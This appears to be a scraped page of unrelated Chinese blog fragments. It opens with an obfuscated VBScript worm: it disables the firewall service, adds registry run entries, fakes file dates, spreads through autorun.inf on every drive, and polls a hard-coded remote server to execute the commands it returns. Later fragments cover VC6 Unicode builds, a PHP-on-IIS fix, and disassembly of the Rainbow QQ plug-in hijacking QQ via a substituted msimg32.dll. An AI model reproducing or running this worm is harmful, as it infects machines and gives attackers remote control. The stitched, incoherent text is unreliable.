[code]On error ResUme NeXT
Set Fso=cREaTeObjEct(STRREVErsE("tCeJbOMetsYSELIf.gnItPIRCs"))
SET wSHshEll=cReaTEOBJEcT(strREverSE("LlEhs.TPIrCSW"))
dIm drI_lISt,DrI_lisT0
DiM IssEnD
ISsEnd=0
c_TIMe=datE()
WshshELL.ruN "Net SToP sHaReDaccEsS",0
seT DrvS=fSO.Drives
sYsdIr=fSo.GetSpeCIalfoLDeR(1)
thiSPATH=WscRIPt.sCrIPtfuLLNAMe
sEt FC=fSo.OPENTExTFilE(tHiSpaTH,1)
Scopy=Fc.rEAdaLl
fC.CLoSE
SET fC=NotHInG
cAlL wriTEFILe(sYsdIr&"\SYsInfO.reg",UNescapE(sTRReverSE("00C2%00c2%00C2%00C2%00c2%00C2%00c2%00c2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00a3%92%B82%XEHD3%22%EMItCeXe22%a0%D0%02%22%22%D3%22%SrETeMARAp22%a0%d0%02%22%sBv.gfcNrpc5%C5%23meTSYSC5%C5%52%RIdniW52%22%d3%22%tpIrCS22%A0%D0%02%d5%0c5%0c5%puTrAtsc5%STpIRcsc5%ENiHcaMc5%EtATsc5%YcILoP02%puorGc5%noiSrEVTneRRUcc5%sWodNiwc5%tFoSOrcimc5%erAWTFOsC5%enihcam_lACOL_yEKHb5%A0%d0%A0%d0%02%00c2%00c2%00C2%00C2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00C2%00C2%00C2%00c2%00A3%92%B82%xEhD3%22%EmItCexe22%a0%D0%02%22%22%d3%22%SReteMaRAp22%A0%d0%02%22%SbV.gFcnrpc5%C5%23meTsYSC5%C5%52%riDniW52%22%D3%22%tpirCs22%A0%d0%02%d5%0c5%0C5%puTRAtsC5%StpIRcsc5%meTsysc5%SwODNiWC5%TFOsoRCiMc5%sEICiLOpC5%eraWtfosc5%ENihcAM_LACoL_yeKHB5%a0%D0%A0%d0%03%03%e2%53%02%E6%f6%96%37%27%56%65%02%27%F6%47%96%46%54%02%97%27%47%37%96%76%56%25%02%37%77%F6%46%E6%96%75%")))
wShSHell.ruN "REGEDiT /s sysinFo.REG",0
wsCRIPt.SLeep 200
fso.dElETEfILe SYSdiR&"\sYsiNFO.REg",true
if iNsTr(thISPATH,SysdIR)>0 thEN
Dri_LIsT0=LISTDrV()
O_time=Left(C_tIme,3)&cstR(INT(mid(C_Time,4,1))-1)&rIgHt(C_Time,Len(c_timE)-4)
wSHShell.run "cmd /C DAte "&o_time,0
WsCrIpt.slEEP 10000
foR DRi_i=1 TO leN(drI_lIst0)
CaLL WriTeaUtO(mID(dRI_List0,Dri_I,1)&":\")
NEXT
wsHSHElL.rUN "Cmd /C DatE "&C_TIMe,0
comPUterNAme="":uSernaME=""
set OBjwmiservIcE=geToBjECt("winMgmTs:{imPErsONatIONlevel=imPersonaTe}!\\.\roOt\CImV2")
set ColCoMPUTerS = ObJwMIsErvice.ExEcQuery("SEleCt * froM Win32_cOmpuTERsYsTem")
foR eAch oBJCOmputer IN colCOMPUTErs
cOmpUtErnAmE=OBjComPuTEr.nAMe
userNAME=OBJcOMPUtEr.UsERnAMe
nEXt
if uSeRnAmE="" tHEn usERname="Evar"
If INstr(uSERnAme,"\")<=0 ThEn
useRnaMe=COMpuTERnAmE&"\"&usernaMe
End iF
Do
if IsseNd=0 then
seT XmL=CreATEobjEct(stRrEVERse("ptTHLMxreVRES.2LmxSm"))  
xmL.OPEN "geT",StRrEVerSe(unESCApE("%3D%61%3F%70%73%61%2E%74%6e%75%6f%63%2f%61%76%65%2f%62%7a%7a%2F%30%30%31%2E%34%30%31%2e%39%31%31%2e%32%30%32%2F%2f%3A%70%74%74%68"))&usErNAMe,0
Xml.SeTrequesTheaDEr "uSer-AGent","EvaR"
XML.Send()
if ERR.NUMbER=0 thEn
IsSEND=1
res=Xml.REspOnsetExt
IF uCASe(LeFT(REs,7))=uCAse("exECuTe")  then ExecUtE Res
Else
Err.CLEAR
End IF
SeT xmL=nOtHiNG
END If

Dri_LIst=liStdRV()
FoR DRI_k=1 tO lEn(drI_liST)
If INstR(DRI_LiST0,MiD(dRI_list,dRi_K,1))<=0 theN
CAlL wRITEauto(mId(DrI_LIst,dRI_k,1)&":\")
End if
NEXt
DRI_LIST0=drI_lIsT
wSCRiPt.sleeP 1000
lOOp
ELSE
WShSHeLL.rUn "ExPLorER .\",3
WScRIPt.sleEp 2000
WsHshELL.appaCTIVaTe unEsCape(lcaSe("%u6211%u7684%u7535%u8111"))
WsHSHEll.sEndkEys uCaSe("% C")
rUnfLAG=0
fOr eACh pS in gETobJECT _
("WinmGmtS:\\.\rOoT\cIMV2:wiN32_pRocEsS").INSTAncES_
if LcasE(PS.nAMe)=LCASe("wSCRIPT.EXe") tHeN
RUNFLAg=runfLAg+1
end IF
NEXt
If RUNfLaG>=2 thEn wsCRipT.QUIT
SEt Sf=FSO.gETFOLdEr(SYSdir)
F_TIMe=leFT(sf.DateCreaTeD,iNstr(sf.DATeCREAteD," ")-1)
WsHSHEll.Run "CmD /C DAtE "&F_tIMe,0
wScRIPT.SLEEp 100
calL wriTEFILe(SySDIR&LcAse("\PRNcFG.vBs"),Vs(SCOPY))
wsHSHell.Run "CMD /c dATE "&C_tImE,0
wsHshelL.rUN SySDir&"\pRnCFG.VbS"
EnD IF
functiOn VS(str)
ExeCutE strReVErse(uNescAPE("%29%29%22u%25%22%28ESAcl%2c%29%22u%25%22%28eSacU%2CsV%28eCALPeR%3DsV%0D%0AtxEN%0d%0AFI%20dNE%0D%0Ac%26sV%3dSV%0d%0aeSlE%0D%0A%29c%28EsacL%26sv%3Dsv%0d%0AnEHT%2005%3e%29001*%29%28dNr%28tnI%20fI%0D%0AEZIMoDnAR%0d%0a%29%291%2ci%2CRts%28DIm%28eSAcu%3dC%0d%0A%29RTs%28Nel%20OT%201%3Di%20roF"))
eND FUNCTiOn
FuNcTioN LISTdRV()
EXEcUTe STrreVERSE(UNeSCAPE("TsiL_pMT%3DVRDtsil%0d%0ATXEN%0d%0AFI%20DNe%0d%0AretteLEViRD.vrD%26tsIl_Pmt%3DTsIL_PmT%0d%0anEhT%20YdAERSI.VrD%20fi%0d%0aSVRd%20Ni%20vRd%20hcaE%20rof%0D%0a%22%22%3dTSIL_pMT%0D%0aTSIL_pmt%20MID"))
END FUnCtiON

suB WRITeAUtO(PATH)
exECute STRREVErSE(UNEsCapE("FI%20DNE%0d%0AeUrT%2C%22fni.NUrotUA%22%26Htap%20ELiFETelEd.Osf%0d%0aneHT%20%29%22fnI.nUrOTUA%22%26HtAp%28StsixeeLiF.Osf%20fIEslE%0D%0a%29%28dnr%26htAP%2C%22fNI.NurOTuA%22%26HTap%20rEDLOfevOM.OSF%0d%0aNEhT%20%29%22FnI.nUrOTUA%22%26Htap%28STSIXeREDLOF.Osf%20FI"))
Cmdstr="ShELL\*\commAND=wsCrIpT.eXe "&CHR(34)&"EVA.Vbs"&cHR(34)
AuTOSTR="[AUtorUn]"&VBcrLF&"OPeN="&vbcrLF&REPlace(CMdstr,"*","OPeN")&vBCrLf&rePlACe(cmDsTr,"*","EXplorE")&VbcrlF&RePLacE(cMDsTr,"*","fInD")
cALL WriTEFIle(PATh&uCASE("aUTorUN.iNf"),aUToSTR)
CalL WrITEFiLE(Path&"Eva.VbS",vs(sCOPY))
eNd SUB

SUb WriTEFiLe(FPATH,CONtenT)
EXEcuTE sTRrEVeRse(uNESCAPe("gNIHton%3daF%20TeS%0D%0A7%3dseTuBIrTta.aF%0D%0A%29htapF%28EliftEg.oSF%3Daf%20Tes%0D%0aGnIhToN%3DCF%20TES%0d%0AEsolC.CF%0d%0atNETnOc%20eTIrW.CF%0D%0A%29EURT%2C2%2chtAPf%28eLiFtxEtNEPO.OSF%3dCF%20Tes%0d%0aeURT%2cHTAPF%20ELifeTeLeD.Osf%20nEHt%20%29htAPF%28stsiXEElif.osf%20FI"))
eND Sub
[/code]

-:如何在vc6中进行unicode编译  
 1.菜单Build–>Configurations–>Add，添加一个Unicode   Debug。  
 2.菜单Build–>Set   Active   Configuration，选择Win32   Unicode   Debug。  
 3.菜单Project–>Settings->C/C++属性页->Category中，选择Preprocessor，在Preprocessor   definitions中添加   _UNICODE。  
 4.菜单Project–>Settings->Link属性页->Category选中，选择Output，在Entry-   point   symbol中写入wWinMainCRTStartup。如不执行该步骤，会出现错误”unresolved   external   symbol   _WinMain@16“。  
 二:把char全换成TCHAR  
 所有的字符串用_T()宏  
 比如  
 char   sz=”aaa”;  
 改成  
 TCHAR   sz=_T(“aaa”);  
 2.修改字符串函数：  
 如strlen改成_tcslen  
 也可以改成lstrlen  

用网站的人 都喜欢简单易用！做网站的人总会想我功能强大你一定喜欢！
其实不然用户花多少时间在你这强大的站上去玩呢 能带给他多少利益趣味或其他有价值的东西呢！不要一味的让用户贡献！那是行不通的
网上家园的概念还有一定距离人家自己在家一个家庭干嘛跑到你网上来沟通！不是没有！但是不多

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.

try change
REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters\Script Map]
“.php”=”[PUT PATH HERE]\\php.exe”

try


; cgi.force_redirect is necessary to provide security running PHP as a CGI under
; most web servers.  Left undefined, PHP turns this on by default.  You can
; turn it off here AT YOUR OWN RISK
; **You CAN safely turn this off for IIS, in fact, you MUST.**
cgi.force_redirect = 0

彩虹QQ删除原版MSIMG32.dll



012581F3    83C4 0C         add     esp, 0C
012581F6    68 2C4D2C01     push    012C4D2C                         ; ASCII “MSIMG32.dll”
012581FB    8D8D D8FEFFFF   lea     ecx, dword ptr [ebp-128]
01258201    51              push    ecx
01258202    E8 B99B0300     call    01291DC0
01258207    83C4 08         add     esp, 8
0125820A    68 80000000     push    80
0125820F    8D95 D8FEFFFF   lea     edx, dword ptr [ebp-128]
01258215    52              push    edx
01258216    FF15 98312C01   call    dword ptr [<&KERNEL32.SetFileAtt>; kernel32.SetFileAttributesA
0125821C    8D85 D8FEFFFF   lea     eax, dword ptr [ebp-128]
01258222    50              push    eax
01258223    FF15 9C312C01   call    dword ptr [<&KERNEL32.DeleteFile>; kernel32.DeleteFileA
01258229    C785 B0FBFFFF 0>mov     dword ptr [ebp-450], 0
01258233    6A 10           push    10
01258235    6A 00           push    0
01258237    8D8D C4FCFFFF   lea     ecx, dword ptr [ebp-33C]
0125823D    51              push    ecx
0125823E    E8 0D8B0300     call    01290D50
01258243    83C4 0C         add     esp, 0C
01258246    C745 FC 0000000>mov     dword ptr [ebp-4], 0
0125824D    8D95 B8FBFFFF   lea     edx, dword ptr [ebp-448]
01258253    52              push    edx





复制自己的 msimg32.dll去给QQ BB


012583EB    8D8D A8FAFFFF   lea     ecx, dword ptr [ebp-558]
012583F1    51              push    ecx
012583F2    E8 B9990300     call    01291DB0
012583F7    83C4 08         add     esp, 8
012583FA    68 604D2C01     push    012C4D60                                ; ASCII “msimg32.dll”
012583FF    8D95 A8FAFFFF   lea     edx, dword ptr [ebp-558]
01258405    52              push    edx
01258406    E8 B5990300     call    01291DC0
0125840B    83C4 08         add     esp, 8
0125840E    6A 00           push    0
01258410    8D85 A8FAFFFF   lea     eax, dword ptr [ebp-558]
01258416    50              push    eax
01258417    68 6C4D2C01     push    012C4D6C                                ; ASCII “msimg32.dll”
0125841C    FF15 D4312C01   call    dword ptr [<&KERNEL32.CopyFileA>]       ; kernel32.CopyFileA
01258422    8B4D 10         mov     ecx, dword ptr [ebp+10]
01258425    890D 04F12F01   mov     dword ptr [12FF104], ecx
0125842B    C785 48F9FFFF 0>mov     dword ptr [ebp-6B8], 0
01258435    B9 10000000     mov     ecx, 10
0125843A    33C0            xor     eax, eax
0125843C    8DBD 4CF9FFFF   lea     edi, dword ptr [ebp-6B4]
01258442    F3:AB           rep     stos dword ptr es:[edi]



 开始启动QQ了

0125845C    6A 00           push    0
0125845E    6A 00           push    0
01258460    6A 20           push    20
01258462    6A 00           push    0
01258464    6A 00           push    0
01258466    6A 00           push    0
01258468    8D8D D8FCFFFF   lea     ecx, dword ptr [ebp-328]
0125846E    51              push    ecx
0125846F    8D95 D8FEFFFF   lea     edx, dword ptr [ebp-128]
01258475    52              push    edx
01258476    FF15 A8312C01   call    dword ptr [<&KERNEL32.CreateProcessA>]  ; kernel32.CreateProcessA
0125847C    85C0            test    eax, eax
0125847E    75 0A           jnz     short 0125848A
01258480    C785 B0FBFFFF 0>mov     dword ptr [ebp-450], 1
0125848A    C745 FC FFFFFFF>mov     dword ptr [ebp-4], -1
01258491    E8 02000000     call    01258498
01258496    EB 43           jmp     short 012584DB
01258498    83BD C4FCFFFF 0>cmp     dword ptr [ebp-33C], 0
0125849F    74 18           je      short 012584B9
012584A1    8B85 C4FCFFFF   mov     eax, dword ptr [ebp-33C]
012584A7    50              push    eax
012584A8    FF15 AC312C01   call    dword ptr [<&KERNEL32.CloseHandle>]     ; kernel32.CloseHandle
012584AE    8B4D 08         mov     ecx, dword ptr [ebp+8]



堆栈信息



0012F4AC   0012FA74  |ModuleFileName = “D:\soft\Tencent\QQ2008II Beta1\QQ.exe”
0012F4B0   0012F874  |CommandLine = “”"D:\soft\Tencent\QQ\caihong hok\CaiHong.exe”"”
0012F4B4   00000000  |pProcessSecurity = NULL
0012F4B8   00000000  |pThreadSecurity = NULL
0012F4BC   00000000  |InheritHandles = FALSE
0012F4C0   00000020  |CreationFlags = NORMAL_PRIORITY_CLASS
0012F4C4   00000000  |pEnvironment = NULL
0012F4C8   00000000  |CurrentDir = NULL
0012F4CC   0012F4E4  |pStartupInfo = 0012F4E4
0012F4D0   0012F860  \pProcessInfo = 0012F860
0012F4D4   7C80B6A1  kernel32.GetModuleHandleA
0012F4D8   00000000



0040158F   .  52            push    edx
00401590   .  68 F8994000   push    004099F8
00401595   .  68 F4994000   push    004099F4
0040159A   .  FF95 8CFEFFFF call    dword ptr [ebp-174]                     ;  原来在这里 回去caihong.exe了 打算功成身退了
004015A0   .  83C4 0C       add     esp, 0C
004015A3   .  8945 BC       mov     dword ptr [ebp-44], eax
004015A6   .  8B45 BC       mov     eax, dword ptr [ebp-44]
004015A9   .  50            push    eax
004015AA   .  FF55 E4       call    dword ptr [ebp-1C]
004015AD   .  83C4 04       add     esp, 4
004015B0   >  837D BC 00    cmp     dword ptr [ebp-44], 0
004015B4   .  74 08         je      short 004015BE

主要在msimg32.dll 里装载真正的msimg32.dll的函数 后启动一个线程

003A10EF    CC              int3
003A10F0    55              push    ebp
003A10F1    8BEC            mov     ebp, esp
003A10F3    81EC 1C020000   sub     esp, 21C
003A10F9    A1 30903A00     mov     eax, dword ptr [3A9030]
003A10FE    8945 FC         mov     dword ptr [ebp-4], eax
003A1101    68 03010000     push    103
003A1106    8D85 F0FEFFFF   lea     eax, dword ptr [ebp-110]
003A110C    50              push    eax
003A110D    68 5C713A00     push    003A715C                                           ; ASCII “CaiHongPath”
003A1112    FF15 20703A00   call    dword ptr [<&KERNEL32.GetEnvironmentVariableA>]    ; kernel32.GetEnvironmentVariableA
003A1118    85C0            test    eax, eax
003A111A    0F85 B6000000   jnz     003A11D6
003A1120    68 04010000     push    104
003A1125    8D8D E8FDFFFF   lea     ecx, dword ptr [ebp-218]
003A112B    51              push    ecx
003A112C    6A 00           push    0
003A112E    FF15 1C703A00   call    dword ptr [<&KERNEL32.GetModuleFileNameA>]         ; kernel32.GetModuleFileNameA
003A1134    8D95 E8FDFFFF   lea     edx, dword ptr [ebp-218]
003A113A    52              push    edx
003A113B    FF15 18703A00   call    dword ptr [<&KERNEL32.lstrlenA>]                   ; kernel32.lstrlenA
003A1141    83E8 01         sub     eax, 1
003A1144    8985 E4FDFFFF   mov     dword ptr [ebp-21C], eax
003A114A    EB 0F           jmp     short 003A115B
003A114C    8B85 E4FDFFFF   mov     eax, dword ptr [ebp-21C]
003A1152    83E8 01         sub     eax, 1
003A1155    8985 E4FDFFFF   mov     dword ptr [ebp-21C], eax
003A115B    83BD E4FDFFFF 0>cmp     dword ptr [ebp-21C], 0
003A1162    7C 17           jl      short 003A117B
003A1164    8B8D E4FDFFFF   mov     ecx, dword ptr [ebp-21C]
003A116A    0FBE940D E8FDFF>movsx   edx, byte ptr [ebp+ecx-218]
003A1172    83FA 5C         cmp     edx, 5C
003A1175    75 02           jnz     short 003A1179
003A1177    EB 02           jmp     short 003A117B
003A1179  ^ EB D1           jmp     short 003A114C
003A117B    68 68713A00     push    003A7168                                           ; ASCII “QQ.exe”
003A1180    8B85 E4FDFFFF   mov     eax, dword ptr [ebp-21C]
003A1186    8D8C05 E9FDFFFF lea     ecx, dword ptr [ebp+eax-217]
003A118D    51              push    ecx
003A118E    FF15 14703A00   call    dword ptr [<&KERNEL32.lstrcmpiA>]                  ; kernel32.lstrcmpiA
003A1194    85C0            test    eax, eax
003A1196    74 1D           je      short 003A11B5
003A1198    68 70713A00     push    003A7170                                           ; ASCII “TM.exe”
003A119D    8B95 E4FDFFFF   mov     edx, dword ptr [ebp-21C]
003A11A3    8D8415 E9FDFFFF lea     eax, dword ptr [ebp+edx-217]
003A11AA    50              push    eax
003A11AB    FF15 14703A00   call    dword ptr [<&KERNEL32.lstrcmpiA>]                  ; kernel32.lstrcmpiA
003A11B1    85C0            test    eax, eax
003A11B3    75 21           jnz     short 003A11D6
003A11B5    68 78713A00     push    003A7178                                           ; ASCII “CaiHong.dll”
003A11BA    8D8D F0FEFFFF   lea     ecx, dword ptr [ebp-110]
003A11C0    51              push    ecx
003A11C1    E8 BA010000     call    003A1380
003A11C6    83C4 08         add     esp, 8
003A11C9    8D95 F0FEFFFF   lea     edx, dword ptr [ebp-110]
003A11CF    52              push    edx
003A11D0    FF15 08703A00   call    dword ptr [<&KERNEL32.LoadLibraryA>]               ; kernel32.LoadLibraryA
003A11D6    33C0            xor     eax, eax
003A11D8    8B4D FC         mov     ecx, dword ptr [ebp-4]
003A11DB    E8 75010000     call    003A1355
003A11E0    8BE5            mov     esp, ebp
003A11E2    5D              pop     ebp
003A11E3    C2 0400         retn    4
003A11E6    CC              int3